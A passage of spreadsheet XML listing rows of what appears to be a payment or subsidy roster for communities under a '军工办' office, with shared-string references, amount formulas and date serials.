        <v>45108</v>
      </c>
      <c r="K2555" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2556" customHeight="1" spans="1:11">
      <c r="A2556" s="16" t="s">
        <v>6776</v>
      </c>
      <c r="B2556" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2556" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2556" s="17" t="s">
        <v>6777</v>
      </c>
      <c r="E2556" s="17" t="s">
        <v>4871</v>
      </c>
      <c r="F2556" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2556" s="17">
        <v>1</v>
      </c>
      <c r="H2556" s="18">
        <v>365</v>
      </c>
      <c r="I2556" s="17">
        <f t="shared" si="124"/>
        <v>365</v>
      </c>
      <c r="J2556" s="29">
        <v>45108</v>
      </c>
      <c r="K2556" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2557" customHeight="1" spans="1:11">
      <c r="A2557" s="16" t="s">
        <v>6778</v>
      </c>
      <c r="B2557" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2557" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2557" s="17" t="s">
        <v>6779</v>
      </c>
      <c r="E2557" s="17" t="s">
        <v>4785</v>
      </c>
      <c r="F2557" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2557" s="17">
        <v>1</v>
      </c>
      <c r="H2557" s="18">
        <v>365</v>
      </c>
      <c r="I2557" s="17">
        <f t="shared" si="124"/>
        <v>365</v>
      </c>
      <c r="J2557" s="29">
        <v>45108</v>
      </c>
      <c r="K2557" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2558" customHeight="1" spans="1:11">
      <c r="A2558" s="16" t="s">
        <v>6780</v>
      </c>
      <c r="B2558" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2558" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2558" s="17" t="s">
        <v>6781</v>
      </c>
      <c r="E2558" s="17" t="s">
        <v>4785</v>
      </c>
      <c r="F2558" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2558" s="17">
        <v>1</v>
      </c>
      <c r="H2558" s="18">
        <v>365</v>
      </c>
      <c r="I2558" s="17">
        <f t="shared" si="124"/>
        <v>365</v>
      </c>
      <c r="J2558" s="29">
        <v>45108</v>
      </c>
      <c r="K2558" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2559" customHeight="1" spans="1:11">
      <c r="A2559" s="16" t="s">
        <v>6782</v>
      </c>
      <c r="B2559" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2559" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2559" s="17" t="s">
        <v>6783</v>
      </c>
      <c r="E2559" s="17" t="s">
        <v>4874</v>
      </c>
      <c r="F2559" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2559" s="17">
        <v>1</v>
      </c>
      <c r="H2559" s="18">
        <v>365</v>
      </c>
      <c r="I2559" s="17">
        <f t="shared" si="124"/>
        <v>365</v>
      </c>
      <c r="J2559" s="29">
        <v>45108</v>
      </c>
      <c r="K2559" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2560" customHeight="1" spans="1:11">
      <c r="A2560" s="16" t="s">
        <v>6784</v>
      </c>
      <c r="B2560" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2560" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2560" s="17" t="s">
        <v>6785</v>
      </c>
      <c r="E2560" s="17" t="s">
        <v>6786</v>
      </c>
      <c r="F2560" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2560" s="17">
        <v>1</v>
      </c>
      <c r="H2560" s="18">
        <v>365</v>
      </c>
      <c r="I2560" s="17">
        <f t="shared" si="124"/>
        <v>365</v>
      </c>
      <c r="J2560" s="29">
        <v>45108</v>
      </c>
      <c r="K2560" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2561" customHeight="1" spans="1:11">
      <c r="A2561" s="16" t="s">
        <v>6787</v>
      </c>
      <c r="B2561" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2561" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2561" s="17" t="s">
        <v>6788</v>
      </c>
      <c r="E2561" s="17" t="s">
        <v>6789</v>
      </c>
      <c r="F2561" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2561" s="17">
        <v>1</v>
      </c>
      <c r="H2561" s="18">
        <v>365</v>
      </c>
      <c r="I2561" s="17">
        <f t="shared" si="124"/>
        <v>365</v>
      </c>
      <c r="J2561" s="29">
        <v>45108</v>
      </c>
      <c r="K2561" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2562" customHeight="1" spans="1:11">
      <c r="A2562" s="16" t="s">
        <v>6790</v>
      </c>
      <c r="B2562" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2562" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2562" s="17" t="s">
        <v>6791</v>
      </c>
      <c r="E2562" s="17" t="s">
        <v>4805</v>
      </c>
      <c r="F2562" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2562" s="17">
        <v>1</v>
      </c>
      <c r="H2562" s="18">
        <v>365</v>
      </c>
      <c r="I2562" s="17">
        <f t="shared" si="124"/>
        <v>365</v>
      </c>
      <c r="J2562" s="29">
        <v>45108</v>
      </c>
      <c r="K2562" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2563" customHeight="1" spans="1:11">
      <c r="A2563" s="16" t="s">
        <v>6792</v>
      </c>
      <c r="B2563" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2563" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2563" s="17" t="s">
        <v>6793</v>
      </c>
      <c r="E2563" s="17" t="s">
        <v>4941</v>
      </c>
      <c r="F2563" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2563" s="17">
        <v>1</v>
      </c>
      <c r="H2563" s="18">
        <v>365</v>
      </c>
      <c r="I2563" s="17">
        <f t="shared" si="124"/>
        <v>365</v>
      </c>
      <c r="J2563" s="29">
        <v>45108</v>
      </c>
      <c r="K2563" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2564" customHeight="1" spans="1:11">
      <c r="A2564" s="16" t="s">
        <v>6794</v>
      </c>
      <c r="B2564" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2564" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2564" s="17" t="s">
        <v>6795</v>
      </c>
      <c r="E2564" s="17" t="s">
        <v>6796</v>
      </c>
      <c r="F2564" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2564" s="17">
        <v>1</v>
      </c>
      <c r="H2564" s="18">
        <v>365</v>
      </c>
      <c r="I2564" s="17">
        <f t="shared" si="124"/>
        <v>365</v>
      </c>
      <c r="J2564" s="29">
        <v>45108</v>
      </c>
      <c r="K2564" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2565" customHeight="1" spans="1:11">
      <c r="A2565" s="16" t="s">
        <v>6797</v>
      </c>
      <c r="B2565" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2565" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2565" s="17" t="s">
        <v>6798</v>
      </c>
      <c r="E2565" s="17" t="s">
        <v>4770</v>
      </c>
      <c r="F2565" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2565" s="17">
        <v>3</v>
      </c>
      <c r="H2565" s="18">
        <v>290</v>
      </c>
      <c r="I2565" s="17">
        <f t="shared" si="124"/>
        <v>870</v>
      </c>
      <c r="J2565" s="29">
        <v>45108</v>
      </c>
      <c r="K2565" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2566" customHeight="1" spans="1:11">
      <c r="A2566" s="16" t="s">
        <v>6799</v>
      </c>
      <c r="B2566" s="17" t="str">
        <f>B2565</f>
        <v>军工办</v>
      </c>
      <c r="C2566" s="17" t="str">
        <f>C2565</f>
        <v>红阳厂社区</v>
      </c>
      <c r="D2566" s="16" t="s">
        <v>6800</v>
      </c>
      <c r="E2566" s="16" t="s">
        <v>6801</v>
      </c>
      <c r="F2566" s="17" t="str">
        <f>F2565</f>
        <v>4113210699</v>
      </c>
      <c r="G2566" s="17"/>
      <c r="H2566" s="17"/>
      <c r="I2566" s="17"/>
      <c r="J2566" s="29"/>
      <c r="K2566" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2567" customHeight="1" spans="1:11">
      <c r="A2567" s="16" t="s">
        <v>6802</v>
      </c>
      <c r="B2567" s="17" t="str">
        <f>B2566</f>
        <v>军工办</v>
      </c>
      <c r="C2567" s="17" t="str">
        <f>C2566</f>
        <v>红阳厂社区</v>
      </c>
      <c r="D2567" s="16" t="s">
        <v>6803</v>
      </c>
      <c r="E2567" s="24" t="s">
        <v>5324</v>
      </c>
      <c r="F2567" s="17" t="str">
        <f>F2566</f>
        <v>4113210699</v>
      </c>
      <c r="G2567" s="17"/>
      <c r="H2567" s="17"/>
      <c r="I2567" s="17"/>
      <c r="J2567" s="29"/>
      <c r="K2567" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2568" customHeight="1" spans="1:11">
      <c r="A2568" s="16" t="s">
        <v>6804</v>
      </c>
      <c r="B2568" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2568" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2568" s="17" t="s">
        <v>6805</v>
      </c>
      <c r="E2568" s="17" t="s">
        <v>6806</v>
      </c>
      <c r="F2568" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2568" s="17">
        <v>1</v>
      </c>
      <c r="H2568" s="18">
        <v>365</v>
      </c>
      <c r="I2568" s="17">
        <f>H2568*G2568</f>
        <v>365</v>
      </c>
      <c r="J2568" s="29">
        <v>45108</v>
      </c>
      <c r="K2568" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2569" customHeight="1" spans="1:11">
      <c r="A2569" s="16" t="s">
        <v>6807</v>
      </c>
      <c r="B2569" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2569" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2569" s="17" t="s">
        <v>6808</v>
      </c>
      <c r="E2569" s="17" t="s">
        <v>4941</v>
      </c>
      <c r="F2569" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2569" s="17">
        <v>1</v>
      </c>
      <c r="H2569" s="18">
        <v>365</v>
      </c>
      <c r="I2569" s="17">
        <f>H2569*G2569</f>
        <v>365</v>
      </c>
      <c r="J2569" s="29">
        <v>45108</v>
      </c>
      <c r="K2569" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2570" customHeight="1" spans="1:11">
      <c r="A2570" s="16" t="s">
        <v>6809</v>
      </c>
      <c r="B2570" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2570" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2570" s="17" t="s">
        <v>6810</v>
      </c>
      <c r="E2570" s="17" t="s">
        <v>6811</v>
      </c>
      <c r="F2570" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2570" s="17">
        <v>2</v>
      </c>
      <c r="H2570" s="18">
        <v>325</v>
      </c>
      <c r="I2570" s="17">
        <f>H2570*G2570</f>
        <v>650</v>
      </c>
      <c r="J2570" s="17">
        <v>45231</v>
      </c>
      <c r="K2570" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2571" customHeight="1" spans="1:11">
      <c r="A2571" s="16" t="s">
        <v>6812</v>
      </c>
      <c r="B2571" s="17" t="str">
        <f>B2570</f>
        <v>军工办</v>
      </c>
      <c r="C2571" s="17" t="str">
        <f>C2570</f>
        <v>红阳厂社区</v>
      </c>
      <c r="D2571" s="25" t="s">
        <v>6813</v>
      </c>
      <c r="E2571" s="25" t="s">
        <v>6814</v>
      </c>
      <c r="F2571" s="17" t="str">
        <f>F2570</f>
        <v>4113210699</v>
      </c>
      <c r="G2571" s="17"/>
      <c r="H2571" s="17"/>
      <c r="I2571" s="17"/>
      <c r="J2571" s="17"/>
      <c r="K2571" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2572" customHeight="1" spans="1:11">
      <c r="A2572" s="16" t="s">
        <v>6815</v>
      </c>
      <c r="B2572" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2572" s="17" t="s">
        <v>6766</v>
      </c>
      <c r="D2572" s="17" t="s">
        <v>6816</v>
      </c>
      <c r="E2572" s="17" t="s">
        <v>6817</v>
      </c>
      <c r="F2572" s="17" t="s">
        <v>5369</v>
      </c>
      <c r="G2572" s="17">
        <v>2</v>
      </c>
      <c r="H2572" s="18">
        <v>325</v>
      </c>
      <c r="I2572" s="17">
        <f>H2572*G2572</f>
        <v>650</v>
      </c>
      <c r="J2572" s="17">
        <v>45231</v>
      </c>
      <c r="K2572" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2573" customHeight="1" spans="1:11">
      <c r="A2573" s="16" t="s">
        <v>6818</v>
      </c>
      <c r="B2573" s="17" t="str">
        <f>B2572</f>
        <v>军工办</v>
      </c>
      <c r="C2573" s="17" t="str">
        <f>C2572</f>
        <v>红阳厂社区</v>
      </c>
      <c r="D2573" s="25" t="s">
        <v>6819</v>
      </c>
      <c r="E2573" s="25" t="s">
        <v>6820</v>
      </c>
      <c r="F2573" s="17" t="str">
        <f>F2572</f>
        <v>4113210699</v>
      </c>
      <c r="G2573" s="17"/>
      <c r="H2573" s="17"/>
      <c r="I2573" s="17"/>
      <c r="J2573" s="17"/>
      <c r="K2573" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2574" customHeight="1" spans="1:11">
      <c r="A2574" s="16" t="s">
        <v>6821</v>
      </c>
      <c r="B2574" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2574" s="17" t="s">
        <v>6822</v>
      </c>
      <c r="D2574" s="17" t="s">
        <v>6823</v>
      </c>
      <c r="E2574" s="17" t="s">
        <v>3574</v>
      </c>
      <c r="F2574" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G2574" s="17">
        <v>1</v>
      </c>
      <c r="H2574" s="18">
        <v>365</v>
      </c>
      <c r="I2574" s="17">
        <f t="shared" ref="I2574:I2593" si="125">H2574*G2574</f>
        <v>365</v>
      </c>
      <c r="J2574" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2574" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2575" customHeight="1" spans="1:11">
      <c r="A2575" s="16" t="s">
        <v>6824</v>
      </c>
      <c r="B2575" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2575" s="17" t="s">
        <v>6822</v>
      </c>
      <c r="D2575" s="17" t="s">
        <v>6825</v>
      </c>
      <c r="E2575" s="17" t="s">
        <v>6826</v>
      </c>
      <c r="F2575" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G2575" s="17">
        <v>1</v>
      </c>
      <c r="H2575" s="18">
        <v>365</v>
      </c>
      <c r="I2575" s="17">
        <f t="shared" si="125"/>
        <v>365</v>
      </c>
      <c r="J2575" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2575" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2576" customHeight="1" spans="1:11">
      <c r="A2576" s="16" t="s">
        <v>6827</v>
      </c>
      <c r="B2576" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2576" s="17" t="s">
        <v>6822</v>
      </c>
      <c r="D2576" s="17" t="s">
        <v>6828</v>
      </c>
      <c r="E2576" s="17" t="s">
        <v>3796</v>
      </c>
      <c r="F2576" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G2576" s="17">
        <v>1</v>
      </c>
      <c r="H2576" s="18">
        <v>365</v>
      </c>
      <c r="I2576" s="17">
        <f t="shared" si="125"/>
        <v>365</v>
      </c>
      <c r="J2576" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2576" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2577" customHeight="1" spans="1:11">
      <c r="A2577" s="16" t="s">
        <v>6829</v>
      </c>
      <c r="B2577" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2577" s="17" t="s">
        <v>6822</v>
      </c>
      <c r="D2577" s="17" t="s">
        <v>6830</v>
      </c>
      <c r="E2577" s="17" t="s">
        <v>3702</v>
      </c>
      <c r="F2577" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G2577" s="17">
        <v>1</v>
      </c>
      <c r="H2577" s="18">
        <v>365</v>
      </c>
      <c r="I2577" s="17">
        <f t="shared" si="125"/>
        <v>365</v>
      </c>
      <c r="J2577" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2577" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2578" customHeight="1" spans="1:11">
      <c r="A2578" s="16" t="s">
        <v>6831</v>
      </c>
      <c r="B2578" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2578" s="17" t="s">
        <v>6822</v>
      </c>
      <c r="D2578" s="17" t="s">
        <v>6832</v>
      </c>
      <c r="E2578" s="17" t="s">
        <v>6833</v>
      </c>
      <c r="F2578" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G2578" s="17">
        <v>1</v>
      </c>
      <c r="H2578" s="18">
        <v>365</v>
      </c>
      <c r="I2578" s="17">
        <f t="shared" si="125"/>
        <v>365</v>
      </c>
      <c r="J2578" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2578" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2579" customHeight="1" spans="1:11">
      <c r="A2579" s="16" t="s">
        <v>6834</v>
      </c>
      <c r="B2579" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2579" s="17" t="s">
        <v>6822</v>
      </c>
      <c r="D2579" s="17" t="s">
        <v>6835</v>
      </c>
      <c r="E2579" s="17" t="s">
        <v>6836</v>
      </c>
      <c r="F2579" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G2579" s="17">
        <v>1</v>
      </c>
      <c r="H2579" s="18">
        <v>365</v>
      </c>
      <c r="I2579" s="17">
        <f t="shared" si="125"/>
        <v>365</v>
      </c>
      <c r="J2579" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2579" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2580" customHeight="1" spans="1:11">
      <c r="A2580" s="16" t="s">
        <v>6837</v>
      </c>
      <c r="B2580" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2580" s="17" t="s">
        <v>6822</v>
      </c>
      <c r="D2580" s="17" t="s">
        <v>6838</v>
      </c>
      <c r="E2580" s="17" t="s">
        <v>3624</v>
      </c>
      <c r="F2580" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G2580" s="17">
        <v>1</v>
      </c>
      <c r="H2580" s="18">
        <v>365</v>
      </c>
      <c r="I2580" s="17">
        <f t="shared" si="125"/>
        <v>365</v>
      </c>
      <c r="J2580" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2580" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2581" customHeight="1" spans="1:11">
      <c r="A2581" s="16" t="s">
        <v>6839</v>
      </c>
      <c r="B2581" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2581" s="17" t="s">
        <v>6822</v>
      </c>
      <c r="D2581" s="17" t="s">
        <v>3816</v>
      </c>
      <c r="E2581" s="17" t="s">
        <v>4877</v>
      </c>
      <c r="F2581" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G2581" s="17">
        <v>1</v>
      </c>
      <c r="H2581" s="18">
        <v>365</v>
      </c>
      <c r="I2581" s="17">
        <f t="shared" si="125"/>
        <v>365</v>
      </c>
      <c r="J2581" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2581" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2582" customHeight="1" spans="1:11">
      <c r="A2582" s="16" t="s">
        <v>6840</v>
      </c>
      <c r="B2582" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2582" s="17" t="s">
        <v>6822</v>
      </c>
      <c r="D2582" s="17" t="s">
        <v>6841</v>
      </c>
      <c r="E2582" s="17" t="s">
        <v>3601</v>
      </c>
      <c r="F2582" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G2582" s="17">
        <v>1</v>
      </c>
      <c r="H2582" s="18">
        <v>365</v>
      </c>
      <c r="I2582" s="17">
        <f t="shared" si="125"/>
        <v>365</v>
      </c>
      <c r="J2582" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2582" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2583" customHeight="1" spans="1:11">
      <c r="A2583" s="16" t="s">
        <v>6842</v>
      </c>
      <c r="B2583" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2583" s="17" t="s">
        <v>6822</v>
      </c>
      <c r="D2583" s="17" t="s">
        <v>6843</v>
      </c>
      <c r="E2583" s="17" t="s">
        <v>4040</v>
      </c>
      <c r="F2583" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G2583" s="17">
        <v>1</v>
      </c>
      <c r="H2583" s="18">
        <v>365</v>
      </c>
      <c r="I2583" s="17">
        <f t="shared" si="125"/>
        <v>365</v>
      </c>
      <c r="J2583" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2583" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2584" customHeight="1" spans="1:11">
      <c r="A2584" s="16" t="s">
        <v>6844</v>
      </c>
      <c r="B2584" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2584" s="17" t="s">
        <v>6822</v>
      </c>
      <c r="D2584" s="17" t="s">
        <v>6845</v>
      </c>
      <c r="E2584" s="17" t="s">
        <v>3699</v>
      </c>
      <c r="F2584" s="17" t="s">
        <v>3676</v>
      </c>
      <c r="G2584" s="17">
        <v>1</v>
      </c>
      <c r="H2584" s="18">
        <v>365</v>
      </c>
      <c r="I2584" s="17">
        <f t="shared" si="125"/>
        <v>365</v>
      </c>
      <c r="J2584" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2584" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2585" customHeight="1" spans="1:11">
      <c r="A2585" s="16" t="s">
        <v>6846</v>
      </c>
      <c r="B2585" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2585" s="17" t="s">
        <v>6847</v>
      </c>
      <c r="D2585" s="17" t="s">
        <v>6848</v>
      </c>
      <c r="E2585" s="17" t="s">
        <v>6849</v>
      </c>
      <c r="F2585" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2585" s="17">
        <v>1</v>
      </c>
      <c r="H2585" s="18">
        <v>365</v>
      </c>
      <c r="I2585" s="17">
        <f t="shared" si="125"/>
        <v>365</v>
      </c>
      <c r="J2585" s="29">
        <v>45108</v>
      </c>
      <c r="K2585" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2586" customHeight="1" spans="1:11">
      <c r="A2586" s="16" t="s">
        <v>6850</v>
      </c>
      <c r="B2586" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2586" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2586" s="17" t="s">
        <v>6852</v>
      </c>
      <c r="E2586" s="17" t="s">
        <v>3211</v>
      </c>
      <c r="F2586" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2586" s="17">
        <v>1</v>
      </c>
      <c r="H2586" s="18">
        <v>365</v>
      </c>
      <c r="I2586" s="17">
        <f t="shared" si="125"/>
        <v>365</v>
      </c>
      <c r="J2586" s="29">
        <v>45108</v>
      </c>
      <c r="K2586" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2587" customHeight="1" spans="1:11">
      <c r="A2587" s="16" t="s">
        <v>6853</v>
      </c>
      <c r="B2587" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2587" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2587" s="17" t="s">
        <v>6854</v>
      </c>
      <c r="E2587" s="17" t="s">
        <v>6855</v>
      </c>
      <c r="F2587" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2587" s="17">
        <v>1</v>
      </c>
      <c r="H2587" s="18">
        <v>365</v>
      </c>
      <c r="I2587" s="17">
        <f t="shared" si="125"/>
        <v>365</v>
      </c>
      <c r="J2587" s="29">
        <v>45108</v>
      </c>
      <c r="K2587" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2588" customHeight="1" spans="1:11">
      <c r="A2588" s="16" t="s">
        <v>6856</v>
      </c>
      <c r="B2588" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2588" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2588" s="17" t="s">
        <v>6857</v>
      </c>
      <c r="E2588" s="17" t="s">
        <v>370</v>
      </c>
      <c r="F2588" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2588" s="17">
        <v>1</v>
      </c>
      <c r="H2588" s="18">
        <v>365</v>
      </c>
      <c r="I2588" s="17">
        <f t="shared" si="125"/>
        <v>365</v>
      </c>
      <c r="J2588" s="29">
        <v>45108</v>
      </c>
      <c r="K2588" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2589" customHeight="1" spans="1:11">
      <c r="A2589" s="16" t="s">
        <v>6858</v>
      </c>
      <c r="B2589" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2589" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2589" s="17" t="s">
        <v>6859</v>
      </c>
      <c r="E2589" s="17" t="s">
        <v>4471</v>
      </c>
      <c r="F2589" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2589" s="17">
        <v>1</v>
      </c>
      <c r="H2589" s="18">
        <v>365</v>
      </c>
      <c r="I2589" s="17">
        <f t="shared" si="125"/>
        <v>365</v>
      </c>
      <c r="J2589" s="29">
        <v>45108</v>
      </c>
      <c r="K2589" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2590" customHeight="1" spans="1:11">
      <c r="A2590" s="16" t="s">
        <v>6860</v>
      </c>
      <c r="B2590" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2590" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2590" s="17" t="s">
        <v>6861</v>
      </c>
      <c r="E2590" s="17" t="s">
        <v>3214</v>
      </c>
      <c r="F2590" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2590" s="17">
        <v>2</v>
      </c>
      <c r="H2590" s="18">
        <v>325</v>
      </c>
      <c r="I2590" s="17">
        <f t="shared" si="125"/>
        <v>650</v>
      </c>
      <c r="J2590" s="29">
        <v>45108</v>
      </c>
      <c r="K2590" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2591" customHeight="1" spans="1:11">
      <c r="A2591" s="16" t="s">
        <v>6862</v>
      </c>
      <c r="B2591" s="17" t="str">
        <f>B2590</f>
        <v>军工办</v>
      </c>
      <c r="C2591" s="17" t="str">
        <f>C2590</f>
        <v>红宇厂</v>
      </c>
      <c r="D2591" s="23" t="s">
        <v>6863</v>
      </c>
      <c r="E2591" s="24" t="s">
        <v>6864</v>
      </c>
      <c r="F2591" s="17">
        <f>F2590</f>
        <v>4113210399</v>
      </c>
      <c r="G2591" s="17"/>
      <c r="H2591" s="17"/>
      <c r="I2591" s="17"/>
      <c r="J2591" s="29"/>
      <c r="K2591" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2592" customHeight="1" spans="1:11">
      <c r="A2592" s="16" t="s">
        <v>6865</v>
      </c>
      <c r="B2592" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2592" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2592" s="17" t="s">
        <v>6866</v>
      </c>
      <c r="E2592" s="17" t="s">
        <v>3339</v>
      </c>
      <c r="F2592" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2592" s="17">
        <v>1</v>
      </c>
      <c r="H2592" s="18">
        <v>365</v>
      </c>
      <c r="I2592" s="17">
        <f t="shared" ref="I2592:I2597" si="126">H2592*G2592</f>
        <v>365</v>
      </c>
      <c r="J2592" s="29">
        <v>45108</v>
      </c>
      <c r="K2592" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2593" customHeight="1" spans="1:11">
      <c r="A2593" s="16" t="s">
        <v>6867</v>
      </c>
      <c r="B2593" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2593" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2593" s="17" t="s">
        <v>6868</v>
      </c>
      <c r="E2593" s="17" t="s">
        <v>6869</v>
      </c>
      <c r="F2593" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2593" s="17">
        <v>1</v>
      </c>
      <c r="H2593" s="18">
        <v>365</v>
      </c>
      <c r="I2593" s="17">
        <f t="shared" si="126"/>
        <v>365</v>
      </c>
      <c r="J2593" s="29">
        <v>45108</v>
      </c>
      <c r="K2593" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2594" customHeight="1" spans="1:11">
      <c r="A2594" s="16" t="s">
        <v>6870</v>
      </c>
      <c r="B2594" s="17" t="s">
        <v>6765</v>
      </c>
      <c r="C2594" s="17" t="s">
        <v>6851</v>
      </c>
      <c r="D2594" s="17" t="s">
        <v>6871</v>
      </c>
      <c r="E2594" s="17" t="s">
        <v>6872</v>
      </c>
      <c r="F2594" s="17">
        <v>4113210399</v>
      </c>
      <c r="G2594" s="17">
        <v>1</v>
      </c>
      <c r="H2594" s="18">
        <v>365</v>
      </c>
      <c r="I2594" s="17">
        <f t="shared" si="126"/>
        <v>365</v>
      </c>
      <c r="J2594" s="29">
